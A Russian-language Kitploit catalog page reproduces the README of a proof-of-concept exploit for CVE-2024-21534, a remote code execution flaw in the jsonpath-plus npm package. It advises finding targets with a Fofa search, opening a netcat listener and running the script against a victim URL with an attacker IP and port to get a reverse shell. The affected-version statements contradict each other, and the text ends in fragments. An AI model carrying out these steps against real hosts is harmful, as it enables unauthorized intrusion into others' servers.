Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus уязвим к удаленному выполнению кода (RCE) из-за некорректной санитизации входных данных | Kitploit
Инструменты/GitHubGitHub/verylazytech/cve-2024-21534
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus уязвим к удаленному выполнению кода (RCE) из-за некорректной санитизации входных данных

Репозиторий
51401 год назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC - CVE-2024-21534 Jsonpath-plus уязвим к удаленному выполнению кода (RCE) из-за неправильной санитизации входных данных

My Shop Medium Github Buy Me A Coffee

Обзор

CVE-2024-21534 — это критическая уязвимость, обнаруженная в версиях пакета jsonpath-plus до версии 10.0.0. Уязвимость возникает из-за неправильной санитизации входных данных, что может привести к удаленному выполнению кода (RCE) на затронутых системах. Эта уязвимость особенно опасна, поскольку она может быть использована без аутентификации, что позволяет злоумышленникам выполнять произвольный код на сервере путем отправки специально созданных входных данных. Проблема возникает из-за небезопасного использования по умолчанию модуля vm в Node.js, который в случае эксплуатации может скомпрометировать всю систему.

Затронутые версии

jsonpath-plus версии до 10.2.0

Затронутые компоненты

Уязвимость находится в пакете jsonpath-plus, который широко используется для запросов к структурам данных JSON в приложениях. Недостаток связан с неправильной санитизацией входных данных, что позволяет выполнять вредоносный код.

Читайте об этом — CVE-2024-21534

Дисклеймер: Эта Proof of Concept (POC) создана только для образовательных и этических целей тестирования. Использование этого инструмента для атак на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб, причиненный этой программой.

Начало работы

Поиск целей

Чтобы найти потенциальные цели, используйте Fofa (похож на Shodan.io):

  • Fofa Dork: Jsonpath-plus

Fofa

Клонирование репозитория

Сначала клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

Теперь откройте слушатель с помощью nc:

root@kitploit:~
nc -lnvp 443

Запустите эксплойт:

Для Linux / MacOs:

Убедитесь, что URL указывает на конечную точку, которая обрабатывает пользовательский ввод через уязвимый пакет jsonpath-plus, так как это позволит использовать уязвимость RCE.

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

перечисление некоторых директорий:

last

Скачать инструмент